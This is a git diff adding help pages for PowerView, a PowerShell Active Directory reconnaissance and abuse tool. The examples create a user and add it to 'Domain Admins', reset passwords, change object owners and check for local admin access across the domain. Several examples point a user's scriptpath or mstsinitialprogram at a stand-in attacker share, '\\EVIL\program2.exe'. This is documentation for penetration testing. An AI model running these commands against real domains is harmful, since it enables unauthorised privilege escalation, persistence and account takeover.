+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Description

+Specifies the description of the group to create.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use to search for user/group principals, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### DirectoryServices.AccountManagement.GroupPrincipal

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md
new file mode 100755
index 0000000..80f4fcf
--- /dev/null
+++ b/docs/Recon/New-DomainUser.md
@@ -0,0 +1,184 @@
+# New-DomainUser

+

+## SYNOPSIS

+Creates a new domain user (assuming appropriate permissions) and returns the user object.

+

+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-PrincipalContext

+

+## SYNTAX

+

+```

+New-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]

+ [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+First binds to the specified domain context using Get-PrincipalContext.

+The bound domain context is then used to create a new

+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword

+

+Creates the 'harmj0y2' user with the specified description and password.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred

+

+Creates the 'harmj0y2' user with the specified description and password, using the specified

+alternate credentials.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred

+

+Creates the 'andy' user with the specified description and password, using the specified

+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember

+and the alternate credentials.

+

+## PARAMETERS

+

+### -SamAccountName

+Specifies the Security Account Manager (SAM) account name of the user to create.

+Maximum of 256 characters.

+Mandatory.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AccountPassword

+Specifies the password for the created user.

+Mandatory.

+

+```yaml

+Type: SecureString

+Parameter Sets: (All)

+Aliases: Password

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Name

+Specifies the name of the user to create.

+If not provided, defaults to SamAccountName.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DisplayName

+Specifies the display name of the user to create.

+If not provided, defaults to SamAccountName.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Description

+Specifies the description of the user to create.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use to search for user/group principals, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 7

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### DirectoryServices.AccountManagement.UserPrincipal

+

+## NOTES

+

+## RELATED LINKS

+

+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)

+

diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md
new file mode 100755
index 0000000..fe6f3b3
--- /dev/null
+++ b/docs/Recon/Remove-RemoteConnection.md
@@ -0,0 +1,84 @@
+# Remove-RemoteConnection

+

+## SYNOPSIS

+Destroys a connection created by New-RemoteConnection.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+### ComputerName (Default)

+```

+Remove-RemoteConnection [-ComputerName] <String[]>

+```

+

+### Path

+```

+Remove-RemoteConnection [-Path] <String[]>

+```

+

+## DESCRIPTION

+This function uses WNetCancelConnection2 to destroy a connection created by

+New-RemoteConnection.

+If a -Path isn't specified, a -ComputerName is required to

+'unmount' \\\\$ComputerName\IPC$.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection

+```

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the system to remove a \\\\ComputerName\IPC$ connection for.

+

+```yaml

+Type: String[]

+Parameter Sets: ComputerName

+Aliases: HostName, dnshostname, name

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the remote \\\\UNC\path to remove the connection for.

+

+```yaml

+Type: String[]

+Parameter Sets: Path

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md
new file mode 100755
index 0000000..744c764
--- /dev/null
+++ b/docs/Recon/Resolve-IPAddress.md
@@ -0,0 +1,66 @@
+# Resolve-IPAddress

+

+## SYNOPSIS

+Resolves a given hostename to its associated IPv4 address.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Resolve-IPAddress [[-ComputerName] <String[]>]

+```

+

+## DESCRIPTION

+Resolves a given hostename to its associated IPv4 address using

+\[Net.Dns\]::GetHostEntry().

+If no hostname is provided, the default

+is the IP address of the localhost.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Resolve-IPAddress -ComputerName SERVER

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+@("SERVER1", "SERVER2") | Resolve-IPAddress

+```

+

+## PARAMETERS

+

+### -ComputerName

+{{Fill ComputerName Description}}

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: $Env:COMPUTERNAME

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more IP address strings on the pipeline.

+

+## OUTPUTS

+

+### System.Management.Automation.PSCustomObject

+

+A custom PSObject with the ComputerName and IPAddress.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md
new file mode 100755
index 0000000..8cb283b
--- /dev/null
+++ b/docs/Recon/Set-DomainObject.md
@@ -0,0 +1,322 @@
+# Set-DomainObject

+

+## SYNOPSIS

+Modifies a gven property for a specified active directory object.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainObject

+

+## SYNTAX

+

+```

+Set-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]

+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Splats user/object targeting parameters to Get-DomainObject, returning the raw

+searchresult object.

+Retrieves the raw directoryentry for the object, and sets

+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values

+from -Clear @().

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

+```

+

+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))

+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose

+```

+

+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: Get-DomainObject filter string:

+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))

+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y

+VERBOSE: Setting countrycode to 1234 for object harmj0y

+VERBOSE: Get-DomainSearcher search string:

+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))

+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser

+VERBOSE: Setting countrycode to 1234 for object testuser

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose

+```

+

+Cleares the 'department' field for both object identities.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose

+```

+

+Name                           Value

+----                           -----

+NORMAL_ACCOUNT                 512

+

+

+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose

+

+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))

+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'

+

+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose

+

+Name                           Value

+----                           -----

+NORMAL_ACCOUNT                 512

+DONT_EXPIRE_PASSWORD           65536

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+Get-DomainUser -Identity testuser -Properties scriptpath

+```

+

+scriptpath

+----------

+\\\\primary\sysvol\blah.ps1

+

+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose

+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain

+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection

+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))

+VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser'

+

+Get-DomainUser -Identity testuser -Properties scriptpath

+

+scriptpath

+----------

+\\\\EVIL\program2.exe

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Set

+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.

+

+```yaml

+Type: Hashtable

+Parameter Sets: (All)

+Aliases: Reaplce

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -XOR

+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.

+

+```yaml

+Type: Hashtable

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Clear

+Specifies an array of object properties that will be cleared in the directory.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Set-DomainObjectOwner.md b/docs/Recon/Set-DomainObjectOwner.md
new file mode 100755
index 0000000..0da8819
--- /dev/null
+++ b/docs/Recon/Set-DomainObjectOwner.md
@@ -0,0 +1,234 @@
+# Set-DomainObjectOwner

+

+## SYNOPSIS

+Modifies the owner for a specified active directory object.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainObject

+

+## SYNTAX

+

+```

+Set-DomainObjectOwner [-Identity] <String> -OwnerIdentity <String> [-Domain <String>] [-LDAPFilter <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Retrieves the Active Directory object specified by -Identity by splatting to

+Get-DomainObject, returning the raw searchresult object.

+Retrieves the raw

+directoryentry for the object, and sets the object owner to -OwnerIdentity.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

+```

+

+Set the owner of 'dfm' in the current domain to 'harmj0y'.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred

+

+Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+of the AD object to set the owner for.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -OwnerIdentity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+of the owner to set for -Identity.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Owner

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md
new file mode 100755
index 0000000..2dd111a
--- /dev/null
+++ b/docs/Recon/Set-DomainUserPassword.md
@@ -0,0 +1,127 @@
+# Set-DomainUserPassword

+

+## SYNOPSIS

+Sets the password for a given user identity.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-PrincipalContext

+

+## SYNTAX

+

+```

+Set-DomainUserPassword [-Identity] <String> -AccountPassword <SecureString> [-Domain <String>]

+ [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+First binds to the specified domain context using Get-PrincipalContext.

+The bound domain context is then used to search for the specified user -Identity,

+which returns a DirectoryServices.AccountManagement.UserPrincipal object.

+The

+SetPassword() function is then invoked on the user, setting the password to -AccountPassword.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword

+

+Resets the password for 'andy' to the password specified.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred

+

+Resets the password for 'andy' usering the alternate credentials specified.

+

+## PARAMETERS

+

+### -Identity

+A user SamAccountName (e.g.

+User1), DistinguishedName (e.g.

+CN=user1,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+specifying the user to reset the password for.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: UserName, UserIdentity, User

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AccountPassword

+Specifies the password to reset the target user's to.

+Mandatory.

+

+```yaml

+Type: SecureString

+Parameter Sets: (All)

+Aliases: Password

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use to search for the user identity, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### DirectoryServices.AccountManagement.UserPrincipal

+

+## NOTES

+

+## RELATED LINKS

+

+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)

+

diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md
new file mode 100755
index 0000000..84eab4e
--- /dev/null
+++ b/docs/Recon/Test-AdminAccess.md
@@ -0,0 +1,101 @@
+# Test-AdminAccess

+

+## SYNOPSIS

+Tests if the current user has administrative access to the local (or a remote) machine.

+

+Idea stolen from the local_admin_search_enum post module in Metasploit written by:  

+    'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'  

+    'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'  

+    'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'  

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf

+

+## SYNTAX

+

+```

+Test-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function will use the OpenSCManagerW Win32API call to establish

+a handle to the remote host.

+If this succeeds, the current user context

+has local administrator acess to the target.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Test-AdminAccess -ComputerName sqlserver

+```

+

+Returns results indicating whether the current user has admin access to the 'sqlserver' host.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainComputer | Test-AdminAccess

+```

+

+Returns what machines in the domain the current user has access to.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Test-AdminAccess -ComputerName sqlserver -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to check for local admin access (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system using Invoke-UserImpersonation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.AdminAccess

+

+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether

+the current user has local admin rights, along with the ComputerName added.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb

+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb

+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)

+

diff --git a/docs/Recon/index.md b/docs/Recon/index.md
new file mode 100755
index 0000000..b3eca5c
--- /dev/null
+++ b/docs/Recon/index.md
@@ -0,0 +1,111 @@
+## PowerView

+

+PowerView is a PowerShell tool to gain network situational awareness on 

+Windows domains. It contains a set of pure-PowerShell replacements for various 

+windows "net *" commands, which utilize PowerShell AD hooks and underlying 

+Win32 API functions to perform useful Windows domain functionality.

+

+It also implements various useful metafunctions, including some custom-written 

+user-hunting functions which will identify where on the network specific users 

+are logged into. It can also check which machines on the domain the current 

+user has local administrator access on. Several functions for the enumeration

+and abuse of domain trusts also exist. See function descriptions for appropriate 

+usage and available options. For detailed output of underlying functionality, pass 

+the -Verbose or -Debug flags.

+

+For functions that enumerate multiple machines, pass the -Verbose flag to get a

+progress status as each host is enumerated. Most of the "meta" functions accept 

+an array of hosts from the pipeline.

+

+

+### Misc Functions:

+    Export-PowerViewCSV             -   thread-safe CSV append

+    Resolve-IPAddress               -   resolves a hostname to an IP

+    ConvertTo-SID                   -   converts a given user/group name to a security identifier (SID)

+    Convert-ADName                  -   converts object names between a variety of formats

+    ConvertFrom-UACValue            -   converts a UAC int value to human readable form

+    Add-RemoteConnection            -   pseudo "mounts" a connection to a remote path using the specified credential object

+    Remove-RemoteConnection         -   destroys a connection created by New-RemoteConnection

